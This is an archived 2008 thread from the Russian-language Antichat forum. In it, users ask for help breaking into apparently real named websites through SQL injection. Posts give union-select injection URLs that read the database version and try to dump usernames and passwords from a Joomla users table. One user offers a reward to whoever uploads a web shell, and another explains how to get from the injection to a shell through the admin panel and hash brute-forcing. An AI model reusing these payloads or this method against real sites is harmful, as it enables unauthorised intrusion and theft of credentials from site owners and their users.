ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
02.05.2008, 10:46
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
Сообщение от CRL
_http://podsekai.ru/page.php?id=104'
В скулях ничего не понимаю.
Но тот, кто зальет туда шел получит шестизнак хуз 966939
http://podsekai.ru/page.php?id=-104+union+select+1,2,3,4,version(),6,7,8,9,0,1,2,3 ,4,5/*
4.0.27
|
|
|
02.05.2008, 11:20
|
|
Участник форума
Регистрация: 21.10.2006
Сообщений: 171
Провел на форуме:
2902967
Репутация:
413
|
|
Это значит что все пропало? Или просто версия)?
|
|
|
|
02.05.2008, 11:45
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Crl
От скули до шелла далековато.Сдесь версия 4 , пользователь без привелегий т.е прав на чтение-запись нет.Значит через скулю не залить,можно попробывать через админку, но чтобы туда попасть нужно найти таблицы с юзерами, а в 4 ветке это либо ручками(угадайка), либо прогами(перебор),затем если пароли в хешах, то брут(опять не известен результат).И еще не факт , что из админки шелл залить получится.
Так что не всё так просто 
Смотрел только эту скуль,по сайту не лазил может там что повеселее есть , но имхо тебе лучше в "работу" обратиться если очень надо
Последний раз редактировалось jokester; 02.05.2008 в 11:47..
|
|
|
|
02.05.2008, 13:07
|
|
Участник форума
Регистрация: 21.10.2006
Сообщений: 171
Провел на форуме:
2902967
Репутация:
413
|
|
Понятно, спасибо, тогда забью)
|
|
|
|
02.05.2008, 22:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
Помогите пожалуйста с инъекцией..
вобщем пробовал
http://gstgroup.ru/index.php?option=com_datsogallery&Itemid=0&func=de tail&id=30'union+select+1,2,3,4,concat_ws(0x3a,id, username,password),6,7,8,9,0,1,2,3,4,5+from+jos_us ers
и
http://gstgroup.ru/index.php?option=com_datsogallery&Itemid=0&func=de tail&catid=5&id=30'union+select+1,2,3,4,concat_ws( 0x3a,id,username,password),6,7,8,9,0,1,2,3,4,5+fro m+jos_users
потом с /* на конце и всё никак =\ Прошу помощи...
|
|
|
|
03.05.2008, 00:38
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
NECros88
Ты с чего взял ,что там инъекция?
|
|
|
|
03.05.2008, 14:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
В смысле? Нашёл в инете инъекцию) Пробую...
|
|
|
|
03.05.2008, 14:08
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
NECros88
Я наверное туплю не по детски,но объясни пожалуиста , по каким признакам ты определил, что параметр id= уязвим?
И как ты подобрал кол-во полей?
|
|
|
|
03.05.2008, 22:28
|
|
Постоянный
Регистрация: 25.02.2008
Сообщений: 331
Провел на форуме:
1073404
Репутация:
189
|
|
http://home.tula.net/service/guestbook?'
Помогите )) "спасибо" не заставит себя ждать)
Последний раз редактировалось OMG!!; 03.05.2008 в 22:48..
|
|
|
|
05.05.2008, 00:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
jokester кол-во полей в этом компоненте имхо одинаковое всегда =\
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
